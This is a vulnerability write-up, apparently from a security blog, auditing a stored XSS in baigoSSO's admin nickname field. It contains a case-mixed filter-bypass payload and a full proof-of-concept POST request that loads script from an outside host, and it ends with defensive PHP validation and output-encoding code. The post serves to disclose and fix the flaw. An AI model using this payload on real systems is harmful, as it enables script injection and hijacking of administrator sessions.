admin

Code Audit: baigoSSO

10 2019/10

Stored XSS

Request URL: `http://ad.com/public/console/profile/info-submit/?1570707122907at0.10176576137213678`

Parameter: admin_nick

File location: app/ctrl/console/profile.ctrl.php
The infoSubmit function (line 70) filters the incoming parameters.


Following the call chain:

Because the incoming parameter is an array, execution enters the fillParam method at line 352.

From there it reaches the input method at line 670.

At line 826 the value is passed to the safe function, which filters the submitted content.

The XSS content in the input is filtered, but we can bypass this filter with the payload:

`<sCRiPt/SrC=//JS-URL>`

This gets past the filtering at this point.

PoC:

POST /public/console/profile/info-submit/?1570709270213at0.7949324520660688 HTTP/1.1
Host: ad.com
Proxy-Connection: keep-alive
Content-Length: 116
Pragma: no-cache
Cache-Control: no-cache
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://ad.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://ad.com/public/console/profile/info/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: baigo_sso_admin_id=1; baigo_sso_admin_hash=62bcd73f59081180cdda5bdf87d86b40; baigo_sso_admin_login_type=form; baigo_sso_admin_cookie_time=1570709261; PHPSESSID=268dc2000398555211fc455bbc0ded26; BX=8k8fbjteptoil&b=3&s=5v; baigoSSOssinID=0de8f68574d90c91896a1ee2a2f1dcaa

__token__=417102b0cdb072c660d1dca097b83ac1&admin_pass=123123&admin_nick=%3CsCRiPt%2FSrC%3D%2F%2F%C3%A7.top%2FImLm%3E

After the change is saved, refreshing the page shows that our XSS payload executed.
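The root cause above is a blacklist-style input filter that tries to recognise dangerous markup, which a case-mixed, slash-separated tag slips past. The fix a defender wants is to stop relying on recognising bad input and instead encode the value at the point where it is rendered into HTML, plus a strict allow-list on the nickname itself. The following PHP is an added example written for this post; it is not baigoSSO's own code, and the function names isValidNick and renderNick, the rendering context (an HTML element body or quoted attribute) and the sample nickname value are assumptions made here.

```php
<?php
// Added example, not baigoSSO code: validate admin_nick on input with an
// allow-list and encode it on output, instead of blacklisting tag patterns.
declare(strict_types=1);

/**
 * Input side: accept only a conservative character set for a nickname.
 * Unicode letters and digits, space, underscore, dot and hyphen, 1..32 chars.
 * Anything containing '<', '>', '/', '=', or quotes is rejected rather than "cleaned",
 * so there is no pattern for an attacker to evade.
 */
function isValidNick(string $nick): bool
{
    return (bool) preg_match('/^[\p{L}\p{N} _.\-]{1,32}$/u', $nick);
}

/**
 * Output side: encode for the HTML context regardless of what input filtering did.
 * ENT_QUOTES encodes both quote styles so the value is also safe inside an attribute;
 * ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
 */
function renderNick(string $nick): string
{
    return htmlspecialchars($nick, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Constructed sample value, shaped like the decoded admin_nick from the request
// above but pointing at a placeholder host (assumption, not the page's payload host).
$submitted = '<sCRiPt/SrC=//example.invalid/x>';

if (!isValidNick($submitted)) {
    // Reject at the API boundary and leave a record for detection/alerting.
    error_log('profile/info-submit: rejected admin_nick containing markup characters');
    http_response_code(400);
}

// Even if validation were skipped, the stored value is rendered inert:
// the angle brackets become entities and the browser shows text, not a tag.
echo renderNick($submitted), PHP_EOL;
```

The two functions are deliberately independent: isValidNick is the control that stops the value from being stored, renderNick is the control that makes the profile page safe even if an older stored value or another write path bypasses validation. htmlspecialchars turns `<` and `>` into `&lt;` and `&gt;`, which is what defeats the tag no matter how its name and attributes are cased or separated.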


Last modification:November 5th, 2019 at 02:54 pm